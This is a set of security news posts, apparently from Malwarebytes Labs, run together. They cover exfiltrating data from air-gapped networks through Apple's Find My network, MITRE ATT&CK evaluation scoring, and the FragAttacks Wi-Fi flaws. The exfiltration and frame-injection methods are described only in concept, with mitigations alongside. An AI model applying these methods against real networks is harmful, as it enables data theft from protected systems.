A researcher has found out that it is possible to upload arbitrary data from non-internet-connected devices by sending Bluetooth Low Energy (BLE) broadcasts to nearby Apple devices that will happily upload the data for you. To demonstrate their point, they released an ESP32 firmware that turns the micro-controller into an (upload only) modem. They also created a macOS application to retrieve, decode and display the uploaded data.

How AirTags are involved

The investigation was triggered by the release of AirTags. AirTags are marketed by Apple as a super-easy way to keep track of your stuff. Basically, you attach an AirTag to your valuables and you can find out where they are using Apple’s Find My app. Unlike a GPS tracker, which requires cell service and can drain batteries quickly, AirTags rely on the popularity of Apple products. The iPhones, iPads, and Macs used by hundreds of millions of people around are nodes in a distributed “Find My” network, joined by BLE signals.

Research theory and practice

Building on previous work by TU Darmstadt, the researcher was curious whether Find My’s Offline Finding network could be (ab)used to upload arbitrary data to the Internet, from devices that are not connected to Wi-Fi or mobile internet. The data would be broadcasted via BLE and hopefully picked up by nearby Apple devices on the Find My network. Then, if those devices were later connected to the Internet, the devices could forward the data to Apple servers, from where it could be retrieved. In theory, such a technique could be used to avoid the cost and power-consumption of mobile Internet access. More interesting from our point of view, it could also be interesting for exfiltrating data!

Sometimes theoretical ideas like this get shot down by practical issues, like the bandwidth restrictions in the AirTag system, for example. But as it turned out, some security and privacy decisions in the design of the Offline Finding mechanism enabled the goal quite efficiently, and, according to the researcher, make it almost impossible to protect against.

Security through obscurity

The Apple Find My Offline Finding system is designed so that:

  • There are no secrets on the AirTag.
  • There is no access for Apple to the user’s location.
  • Tracking protection against nearby adversaries is achieved by rolling public keys

The consequence of this for the research lies in the fact that Apple does not know which public keys belong to your AirTag, and therefore which location reports were intended for you. This means that any device with an Apple ID can get location reports from any AirTag. The security solely lies in the encryption of those location reports: The location can only be decrypted with the correct private key, which is on the owner’s device.

Device

Since there is no way for Apple to check what kind of device is sending out the signal, for the sending side the researcher chose the ESP32, as it is a very common and low-cost microcontroller. Using firmware based on the TU Darmstadt research, the device can broadcast a hardcoded default message and then listens for any new data to broadcast in a loop until a new message is received.

Designing a protocol

To make the sender and receiver understand each other took some tinkering. If you are interested in the more technical aspects, I advise you to read the researcher’s post. But the end goal to set arbitrary bits in the shared key-value store and query them, was reached. Once both the sender and receiver agree on an encoding scheme, it is possible to transfer arbitrary data.

To send properly authenticated retrieval requests the researcher used an AppleMail plugin, a trick that was also described in the German research.

Bridging the air gap

Because devices on the Find My network will cache received broadcasts until they have an Internet connection, this technique can be used to upload data from areas without mobile or Wi-Fi coverage, as long as iPhone owners pass by from time to time. The easiest to imagine use case would be uploading data from remote IoT devices without a broadband modem, SIM card, data plan or Wi-Fi connectivity, but it could also be used in sneakier ways.

In the world of high-security networks, where exotic techniques like blinking server lights and drone cameras are noteworthy techniques for bridging air gaps, visitors’ Apple devices might also be a feasible method for exfiltrating data.

Air-gapped systems where considered the holy grail of security a decade ago. An air-gapped network is one that is physically isolated and not connected to any other network. The idea was that the only way data can be transferred into or out of such a network is by physically inserting some sort of removable media, such as a USB or removable disk, or by connecting a transient device like a laptop. Since then, a lot of research has gone into methods to exfiltrate data from air-gapped networks. It seems this researcher has found another one.

Mitigation

As mentioned earlier, it would be hard for Apple to defend against this kind of misuse if they wanted to. Apple designed the system on the principle of data economy. They cannot read unencrypted locations and do not know which public keys belong to your AirTag, or even which public key a certain encrypted location report belongs to (as they only receive the public key’s SHA256 hash).

However, the researcher points out that hardening of the system might be possible in the following two areas:

  • Authentication of the BLE advertisement.
  • Rate limiting of the location report retrieval.

The authentication could be used to exclude anything other then an AirTag from sending data to Finder devices. The rate limiting could enforce the 16 AirTags per AppleID and make abuse to send large amounts of data a lot harder.

This technique looks more like interesting research than a pressing, real-world problem and it remains to be seen how seriously Apple treats this threat. In the meantime, the company is well aware that data exfiltration isn’t the only nefarious activity that AirTags can be repurposed for.

The post Using iPhones and AirTags to sneak data out of air-gapped networks appeared first on Malwarebytes Labs.

Why MITRE ATT&CK matters—Choosing alert quality over quantity

Round 3 Carbanak/FIN7 results evaluation

Last month, the researchers at MITRE Engenuity released the results of their most recent ATT&CK Evaluation, offering businesses an opportunity to make informed choices about their own security needs. This year, by modeling the ATT&CK testing after attack methods deployed by the hacker groups Carbanak and FIN7, MITRE Engenuity’s newest evaluation sheds lights on how some of the most trusted cybersecurity solutions on the market fare when pitted against some of the most prolific and advanced attacker tactics and techniques to date.

These are the kinds of results that can make any business consider reevaluating its cybersecurity strategy, but before leaping to conclusions, companies should consider whether the results they’re reading are meaningful for their own situations.

For instance, the results are particularly interesting when you put them into the context of real-world environments and experience. As such, it’s critical that organizations without the in-house expertise of a SOC use solutions that are intuitive and effective: The barrage of security alerts can overwhelm, many IT and security teams aren’t going to be able to easily identify the ones that matter, and the more time they spend in the data weeds, the less time they have to dedicate to growing the business. These organizations also may not be set up to tackle the complex configuration updates some products require to deliver quality results.

Thus, while the ATT&CK Evaluation results do reveal Endpoint Detection and Response (EDR) product scope—revealing how much these products detect in an environment—it is important to also evaluate both the quality (not just the quantity) of that data and how easily the results can be replicated and acted on by your team.

In their article “Winning MITRE ATT&CK, Losing Sight of Customers” Forrester analysts Jeff Pollard and Allie Mellendo explore this exact challenge, noting that “’domination’ of the results does not prove the tool will be effective given your infrastructure, your team, or your business goals,” and that the ATT&CK Evaluation is “focused on the TOOL.”

“It’s NOT focused on the experience,” Pollard and Mellendo said. “There are lots of great products poorly deployed, not deployed at all, misconfigured, or lacking the right visibility to be maximally effective.” To put this year’s ATT&CK Evaluation into context for our readers, we are going to listen to the experts—including Pollard and Mellen—and we are going to apply the framework created last year by former Forrester analyst Josh Zelonis to evaluate the Round 2 APT29 results (Zelonis has updated his framework for Round 3 in his GitHub repository).

Because of this, the graph we’re going to show you may not look like the graphs you’ve seen across the Internet. We understand that. But we think it is just as important to present you actionable information delivered out of the box as it is to present you true information. And, fairly, this applies to all the cybersecurity providers included in this year’s ATT&CK Evaluation. 

With that in mind, we will also explain further below how we arrived at the following results:

Combined protection and detection results

Eliminating configuration changes

First, Zelonis’s framework discards mid-test configuration changes that improved detection capabilities.

During the test, vendors may choose to change a standard setting to better detect the attacker technique being tested. These revised configurations are likely not the default settings for customers because they’d result in too many alerts. It’s better not to have a detection rule in place you know will be noisy, generate false positives, and leave you scratching your head about what really matters in all that signal. Similarly, making these same configuration changes in-house is an unreasonable expectation of many customers. The vendors themselves had a team of experts on hand to review the results, determine the changes to make, and respond.

To map the test results to the needs and knowledge of many customers, we will discard any steps that were detected with a significant configuration change that affects the product’s detection capabilities. Now, we can better compare out-of-the-box product configuration and alert investigation experiences.

Determining alert quality

Alert quality is also critical when you want to quickly determine what you need to investigate and respond to. We suggest you use the following to help interpret the ATT&CK Evaluations results:

Security analytics

In this test detections can be any of the three types of alerts—General, Tactic, and Technique—and there is a hierarchy to these detection types.

Enriched data - Alerts

The highest quality alerts are Techniques. They are where the real detail comes into play—where you know what you are dealing with, the specific steps taken, and what to investigate swiftly. For example, compare the following two alerts:

  1. “A PowerShell script executed”
  2. “T1041 – Exfiltration Over Command and Control Channel”

The latter provides precise, actionable details about what occurred— the theft of data—and how. 

The more Techniques in the vendor’s results, the better the analytics capabilities of their EDR product and the swifter the investigation. Thus, we determine the quality of the alerts triggered by an EDR product by dividing the total number of Technique Alerts by the total number of Detections. 

Percentage of actionable alerts to total number of detections

We strongly believe that small IT and security teams should prioritize alert quality over quantity when evaluating an EDR product, while enterprises and MSPs will also benefit from enriching their SOC data with greater context.

Quality rate

EDR vendors should strive for quality alerts out of the box, but they also have to trigger enough quality alerts for IT and security teams to have that all-important level of detail about every action that attackers have taken. To complete this perspective of the data, then, we define Quality Rate by dividing the total number of Technique alerts by the total number of steps during the test. Was there a quality alert for each step?

Percentage of quality alerts

Getting the complete picture

One last consideration is worthwhile. EDR is an essential endpoint security strategy today, but endpoint protection—the prevention side of the story—also plays a critical role, and even more so for those who aren’t looking to hire or invest in an incident response team. Just as reducing the noise helps you zero in on alerts that matter, reducing the attack surface—assessing vulnerabilities and securing weak points in your defenses—helps you limit the threats that get through so you can more easily respond to them.

In the Round 3 evaluation, MITRE Engenuity also assessed protection capabilities. Let’s combine the protection and detection results to get the complete picture:

Combined protection and detection results

When viewed in context, Malwarebytes blocked eight out of 10 attacks on the earlier stages of the attack chain. Malwarebytes is not an EDR-only solution. It is a complete, integrated EP + EDR solution that provides multi-layered defense-in-depth for all types of modern cyberattacks, while remaining easy to use out of the box by organizations of all sizes.

We share this information to inform. Companies deserve to know exactly what they are buying when they purchase a cybersecurity solution, and they deserve to know how those solutions are tested—that includes the conditions, the circumstances, and the real-world applications of those tests.

At Malwarebytes we must be realistic about those real-world applications. For many businesses, cybersecurity is a set-it-and-forget-it product, and in-house SOCs and internal teams that can routinely adjust alert settings are luxuries. That’s just a fact, and it does not matter whether the cybersecurity industry likes or doesn’t like that fact—what matters is whether cybersecurity vendors are willing to honestly support their customers’ needs.

The post Why MITRE ATT&CK matters—Choosing alert quality over quantity appeared first on Malwarebytes Labs.

FragAttack: New Wi-Fi vulnerabilities that affect… basically everything

A new set of vulnerabilities with an aggressive name and their own website almost always bodes ill. The name FragAttack is a contraction of fragmentation and aggregation attacks, which immediately indicates the main area where the vulnerabilities were found.

The vulnerabilities are mostly in how Wi-Fi and connected devices handle data packets, and more particularly in how they handle fragments and frames of data packets. As far as the researcher is aware every Wi-Fi product is affected by at least one vulnerability.

The research

The researcher that uncovered the Wi-Fi vulnerabilities, some of which have existed since 1997, is Mathy Vanhoef. The vulnerabilities he discovered affect all modern Wi-Fi security protocols, including the latest WPA3 specification. You may remember Vanhoef as one of the researchers behind the KrackAttacks weaknesses in the WPA2 protocol. As Vanhoef puts it:

“it stays important to analyze even the most well-known security. Additionally, it shows that it’s essential to regularly test Wi-Fi products for security vulnerabilities, which can for instance be done when certifying them.”

Packet fragmentation

In each network, there is a maximum size to the chunks of data that can be transmitted on a network layer, called the MTU (Maximum Transmission Unit). Packets can often be larger than this maximum size, so to fit inside the MTU limit each packet can be divided into smaller pieces of data, called fragments. These fragments are later re-assembled to reconstruct the original message.

Wi-Fi networks can use this packet fragmentation to improve throughput. By fragmenting data packets and sending more, but shorter frames, each transmission will have a lower probability of collision with another packet. So, if the content of a message is too large to fit inside a single packet, the content is spread across several fragments, each with its own header.

Just like packets, frames are small parts of a message in the network. A frame helps to identify data and determine the way it should be decoded and interpreted. The main difference between a packet and a frame is the association with the OSI layers. While a packet is the unit of data used in the network layer, a frame is the unit of data used on the layer below it in the OSI model’s data link layer. A frame contains more information about the transmitted message than a packet.

The vulnerabilities

The researcher found several implementation flaws that can be abused to easily inject frames into a protected Wi-Fi network. These vulnerabilities can be grouped as follows:

Device-specific flaws

  • Some Wi-Fi devices accept any unencrypted frame even when connected to a protected Wi-Fi network.
  • Certain devices accept plaintext aggregated frames that look like handshake messages.
  • Worse than those, some devices accept broadcast fragments even when sent unencrypted.

Design flaws in the Wi-Fi feature that handling frames

  • The frame aggregation feature of Wi-Fi uses an “is aggregated” flag that is not authenticated and can be modified by an adversary.
  • Another design flaw is in the frame fragmentation feature of Wi-Fi. Receivers are not required to check whether every fragment that belongs to the same frame is encrypted with the same key and will reassemble fragments that were decrypted using different keys.
  • The third design flaw is also in Wi-Fi’s frame fragmentation feature. When a client disconnects from the network, the Wi-Fi device is not required to remove non-reassembled fragments from memory.

A few other implementation vulnerabilities that can be used to escalate the flaws mentioned above.

CVE’s

Publicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). Although each affected codebase normally receives a unique CVE, the agreement between affected vendors was that, in this specific case, using the same CVE across different codebases would make communication easier.

The design flaws were assigned the following CVEs:

  • CVE-2020-24588: Aggregation attack (accepting non-SPP A-MSDU frames).
  • CVE-2020-24587: Mixed key attack (reassembling fragments encrypted under different keys).
  • CVE-2020-24586: Fragment cache attack (not clearing fragments from memory when (re)connecting to a network).

Implementation vulnerabilities that allow the trivial injection of plaintext frames in a protected Wi-Fi network were assigned these CVEs:

  • CVE-2020-26145: Samsung Galaxy S3 accepting plaintext broadcast fragments as full frames (in an encrypted network).
  • CVE-2020-26144: Samsung Galaxy S3 accepting plaintext A-MSDU frames that start with an RFC1042 header with EtherType EAPOL (in an encrypted network).
  • CVE-2020-26140: Alfa Windows 10 driver for AWUS036H accepting plaintext data frames in a protected network.
  • CVE-2020-26143: Alfa Windows 10 driver 1030.36.604 for AWUS036ACH accepting fragmented plaintext data frames in a protected network.

Other implementation flaws are assigned the following CVEs:

  • CVE-2020-26139: NetBSD forwarding EAPOL frames even though the sender is not yet authenticated.
  • CVE-2020-26146: Samsung Galaxy S3 reassembling encrypted fragments with non-consecutive packet numbers.
  • CVE-2020-26147: Linux kernel 5.8.9 reassembling mixed encrypted/plaintext fragments.
  • CVE-2020-26142: OpenBSD 6.6 kernel processing fragmented frames as full frames.
  • CVE-2020-26141: ALFA Windows 10 driver for AWUS036H not verifying the TKIP MIC of fragmented frames.

Vulnerable devices

On the dedicated site the researcher states that

“experiments indicate that every Wi-Fi product is affected by at least one vulnerability and that most products are affected by several vulnerabilities.”

The statement is based on testing more than 75 devices, which showed they were all vulnerable to one or more of the discovered attacks.

Mitigation

To mitigate attacks where your router’s NAT/firewall is bypassed and devices are directly attacked, you must assure that all your devices will need to be updated. Unfortunately, not all products get regular updates.

Using a VPN can prevent attacks where an adversary is trying to exfiltrate data. It will not prevent an adversary from bypassing your router’s NAT/firewall to directly attack devices.

The impact of attacks can also be reduced by manually configuring your DNS server so that it cannot be poisoned.

Graveness of the vulnerabilities

We have been here before. When the KRACK vulnerabilities were revealed a few years ago some people treated it as if it was the end of Wi-Fi. You’ll have noticed it wasn’t. That doesn’t mean it was nothing, either, but a little perspective goes a long way.

The CVEs registered to the FragAttacks have been given a medium severity rating and have CVSS scores sitting between 4.8 to 6.5. Which indicates that the chances of anything resembling remote control is probably too difficult to achieve to make it attractive. The data stealing options however are more imminent and could well be used in specific attacks.

Proof is in the pudding

If you are interested, you can find a demo and a link to a testing tool on the dedicated website. You can also find some FAQs and a pre-recorded presentation made for USENIX Security about these vulnerabilities.

Stay safe, everyone!

The post FragAttack: New Wi-Fi vulnerabilities that affect… basically everything appeared first on Malwarebytes Labs.